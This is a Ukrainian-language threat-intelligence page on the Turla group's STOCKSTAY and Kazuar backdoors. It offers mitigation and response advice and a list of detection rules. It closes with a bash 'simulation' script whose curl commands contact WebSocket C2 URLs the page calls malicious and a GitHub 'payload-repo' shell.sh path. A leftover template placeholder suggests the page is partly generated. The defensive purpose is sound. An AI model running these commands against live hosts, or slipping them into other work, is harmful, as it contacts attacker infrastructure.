Turla (Таємний Бліззард): BACKDOORи STOCKSTAY і Kazuar Описані
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Turla — це давно відома група APT, пов’язана з Росією та ФСБ, відома операціями кібер-шпигунства проти урядових і військових цілей. Група покладається на спеціалізоване шкідливе ПЗ, включаючи бекдори STOCKSTAY та Kazuar, для збереження довгострокового доступу в скомпрометованих середовищах. Вона також часто зловживає легітимними хмарними сервісами, такими як GitHub та Cloudflare, для маскування трафіку командування і контролю.
Розслідування
Звіт досліджує еволюцію наборів інструментів шкідливого ПЗ Turla, зосереджуючись на родинах STOCKSTAY та Kazuar. Він аналізує техніки захоплення інфраструктури групою, використання безсерверних платформ для командування і контролю, а також можливість використання вразливостей, таких як обход шляху WinRAR. Розслідування також підкреслює використання Turla екологічного ключування для зниження впливу на аналіз у пісочниці.
Пом’якшення
Організації повинні розгорнути потужний моніторинг для несанкціонованого використання довірених веб-платформ, таких як GitHub і Cloudflare, коли шаблони трафіку виглядають аномальними. Своєчасне виправлення вразливостей, таких як CVE-2025-8088 є ключовим для запобігання несанкціонованого запису файлів. Захисники також повинні стежити за несанкціонованою установкою кореневих сертифікатів та підозрілими виконаннями PowerShell або VBScript, які можуть вказувати на активність Turla.
Реагування
Якщо зафіксована активність Turla, реагуючі повинні ізолювати уражені хости та розслідувати на наявність несанкціонованих локальних адміністративних облікових записів. Повинен бути проведений детальний огляд дерев процесів, щоб виявити завантаження DLL з легітимними бінарниками, такими як утиліти від NVIDIA або Brother Printer. Телеметрія мережі також повинна бути перевірена на наявність незвичайного трафіку WebSocket, а сховище довіри машини — на підозрілі зміни сертифікатів.
Потік атаки
Виявлення
Можливі точки стійкості [ASEPs – Software/NTUSER Hive] (через події реєстру)
Переглянути
LOLBAS WScript / CScript (через створення процесів)
Переглянути
Використання Certutil для кодування даних та операцій з сертифікатами (через командний рядок)
Переглянути
Підозрілі рядки Powershell (через powershell)
Переглянути
Можливий контакт із динамічним DNS-сервісом (через dns)
Переглянути
Активність декодування 3DES Kazuar PowerShell [Windows Powershell]
Переглянути
Виявлення комунікації Turla STOCKSTAY C2 через захищений WebSocket та GitHub Staging [Вебсервер]
Переглянути
Виконання симуляції
Передумова: Перевірка телеметрії та базового рівня перед польотом повинна бути пройдена.
Обґрунтування: У цьому розділі детально описано точне виконання техніки противника (TTP), розробленої для запуску правила виявлення. Команди та наративи ПОВИННІ прямо відображати визначені TTP та прагнути генерувати точну телеметрію, очікувану логікою виявлення. Абстрактні або не пов’язані приклади призведуть до неправильного діагнозу.
-
Наратив атаки та команди: Супротивник успішно встановив опору і зараз намагається встановити комунікацію C2. Щоб уникнути виявлення, вони використовують підхід «життя за рахунок натури», звертаючись до платформи без серверів, розміщеної на
onrender.comчерез з’єднання WebSocket. Одночасно вони намагаються завантажити корисне навантаження другого етапу з публічного репозиторію GitHub, щоб зливатися з трафіком розробників. Симуляція буде використовуватиcurlandwscat(якщо доступно) або стандартні веб-запити для створення специфічних шаблонів URL, визначених у логіці виявлення. -
Скрипт регресійного тестування: [Provide the exact, self-contained, and executable code snippet for the simulation.]
#!/bin/bash # Скрипт симуляції для STOCKSTAY C2 Verification Detection echo "[+] Старт симуляції: STOCKSTAY C2 TTP's" # 1. Тригер: WebSocket C2 через Render (специфічний URL) echo "[*] Симуляція з'єднання WebSocket до шкідливого URL Render..." curl -k "wss://google-ai-labs-it.onrender.com/ws" # 2. Тригер: WebSocket C2 через Glitch (специфічний URL) echo "[*] Симуляція з'єднання WebSocket до шкідливого URL Glitch..." curl -k "wss://wool-basalt-clock.glitch.me/ws" # 3. Тригер: GitHub підготовка (широке доменне співпадіння) echo "[*] Симуляція розміщення корисного навантаження через GitHub..." curl -I "https://github.com/malicious-actor/payload-repo/raw/main/shell.sh" echo "[+] Симуляція завершена. Перевірте SIEM на наявність сигналів тривоги." -
Команди очищення:
# Постійні артефакти не створюються на хості цією симуляцією. # Переконайтеся, що будь-які тимчасові bash-файли видалено, якщо були створені. rm -f simulation_stockstay.sh